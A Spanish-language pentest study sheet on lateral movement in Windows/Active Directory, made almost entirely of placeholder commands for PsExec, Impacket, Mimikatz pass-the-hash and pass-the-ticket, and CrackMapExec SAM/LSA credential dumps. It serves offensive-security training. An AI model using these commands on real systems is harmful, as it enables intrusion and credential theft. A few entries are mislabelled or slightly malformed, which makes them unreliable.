===========================================================
  T2 - 7. MOVIMIENTO LATERAL
===========================================================
Protocolos:
  SMB    : compartir archivos (445)
  WinRM  : remoto Windows (5985/5986)
  DCOM   : ejecucion remota
  WMI    : gestion (135 + dinamicos)
  RDP    : escritorio remoto (3389)

===========================================================
  WINDOWS -> WINDOWS (con credenciales)
===========================================================

--- PSEXEC (Sysinternals) ---
PsExec.exe \\[HOSTNAME] -u [USER] -p [PASS] cmd
PsExec.exe \\[HOSTNAME] -u [USER] -p [PASS] -s cmd     # SYSTEM
PsExec.exe \\[HOSTNAME] -u [USER] -p [PASS] -accepteula cmd

--- POWERSHELL REMOTE (PSRemoting / WinRM) ---
$cred = Get-Credential
Enter-PSSession -ComputerName [HOSTNAME] -Credential $cred

# Ejecutar comando puntual
Invoke-Command -ComputerName [HOSTNAME] -Credential $cred -ScriptBlock { whoami }

--- WMIC (sin output) ---
wmic /node:[HOSTNAME] /user:[USER] /password:[PASS] process call create "cmd.exe /c [COMANDO]"

--- DCOM ---
Invoke-DCOM -ComputerName '[IP]' -Method MMC20.Application -Command "[COMANDO]"

# MMC20.Application, ShellWindows, ShellBrowserWindow son metodos comunes

===========================================================
  LINUX -> WINDOWS (Impacket)
===========================================================

--- SMB INTERACTIVO ---
impacket-psexec [DOMINIO]/[USER]:[PASS]@[IP]
impacket-smbexec [DOMINIO]/[USER]:[PASS]@[IP]

--- WMI (no interactivo, sigiloso) ---
impacket-wmiexec [DOMINIO]/[USER]:[PASS]@[IP]

--- WINRM ---
impacket-wmiexec -k [DOMINIO]/[USER]:[PASS]@[IP]
evil-winrm -i [IP] -u [USER] -p [PASS]

--- RDP CON SHARE ---
rdesktop -d [DOMINIO] -u [USER] -p [PASS] [IP] -r disk:share=/root/myshare
xfreerdp /u:[USER] /d:[DOMINIO] /p:[PASS] /v:[IP] +clipboard /drive:share,/root/myshare

===========================================================
  PASS-THE-HASH (PTH)
===========================================================
# Usa hash NTLM directamente (challenge/response NTLM)

--- LINUX ---
impacket-psexec [DOMINIO]/[USER]@[IP] -hashes [LM]:[NT]
impacket-smbexec [DOMINIO]/[USER]@[IP] -hashes [LM]:[NT]
impacket-wmiexec [DOMINIO]/[USER]@[IP] -hashes [LM]:[NT]

--- RDP (sin NLA) ---
xfreerdp /u:[USER] /d:[DOMINIO] /pth:[NT-HASH] /v:[IP]

--- WINDOWS (Mimikatz) ---
mimikatz # sekurlsa::pth /user:[USER] /domain:[DOMINIO] /ntlm:[NT-HASH] /run:cmd

===========================================================
  OVERPASS-THE-HASH (Hash -> TGT Kerberos)
===========================================================
# Convierte NTLM en TGT (mejor en entornos con Kerberos)

--- WINDOWS (Mimikatz) ---
mimikatz # sekurlsa::pth /user:[USER] /domain:[FQDN] /ntlm:[NT-HASH] /run:cmd

--- LINUX (Impacket) ---
# Primero obtener TGT con hash
impacket-getTGT [FQDN]/[USER] -hashes :[NT-HASH]

export KRB5CCNAME=[USER].ccache

# Usar el TGT
impacket-psexec [FQDN]/[USER]@[FQDN-OBJETIVO] -k -no-pass -dc-ip [IP-DC] -target-ip [IP-OBJETIVO]

===========================================================
  KERBEROS - CONCEPTOS
===========================================================
KDC  : Key Distribution Center (=DC en AD)
TGT  : Ticket Granting Ticket (autenticacion contra Kerberos)
TGS  : Service Ticket (autenticacion contra servicio)

Flujo:
  AS-REQ  -> KDC
  AS-REP  <- KDC  (TGT)
  TGS-REQ -> KDC  (con TGT)
  TGS-REP <- KDC  (TGS)
  AP-REQ  -> Servicio (con TGS)

===========================================================
  PASS-THE-TICKET (PTT)
===========================================================

--- EXPORTAR TICKETS DESDE MEMORIA ---
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

# Identificar el TGT objetivo
dir | findstr "[USER]" | findstr "krbtgt"

--- INYECTAR TICKET ---
mimikatz # kerberos::ptt [ARCHIVO.kirbi]

# Verificar
klist

--- LINUX (ccache) ---
export KRB5CCNAME=[ARCHIVO.ccache]
klist

# Conversion entre formatos
impacket-ticketConverter [TICKET.kirbi]   [TICKET.ccache]
impacket-ticketConverter [TICKET.ccache]  [TICKET.kirbi]

===========================================================
  PTH CON HASHES DE MAQUINAS ($)
===========================================================

--- WINDOWS ---
mimikatz # sekurlsa::pth /user:[NOMBRE-MAQ]$ /domain:[FQDN] /ntlm:[NT-HASH]

--- LINUX ---
impacket-secretsdump [NOMBRE-MAQ]/$@[IP] -hashes :[NT-HASH]

===========================================================
  FERRAMIENTAS UTILES (CrackMapExec / NetExec)
===========================================================
# Validar credenciales en bloque
crackmapexec smb [RANGO] -u [USER] -p [PASS]

# Con hash
crackmapexec smb [RANGO] -u [USER] -H [NT-HASH]

# Comprobar admin local
crackmapexec smb [RANGO] -u [USER] -p [PASS] --local-auth

# Volcar SAM
crackmapexec smb [IP] -u [USER] -p [PASS] --sam

# Volcar LSA
crackmapexec smb [IP] -u [USER] -p [PASS] --lsa

# Ejecutar comando
crackmapexec smb [IP] -u [USER] -p [PASS] -x '[COMANDO]'
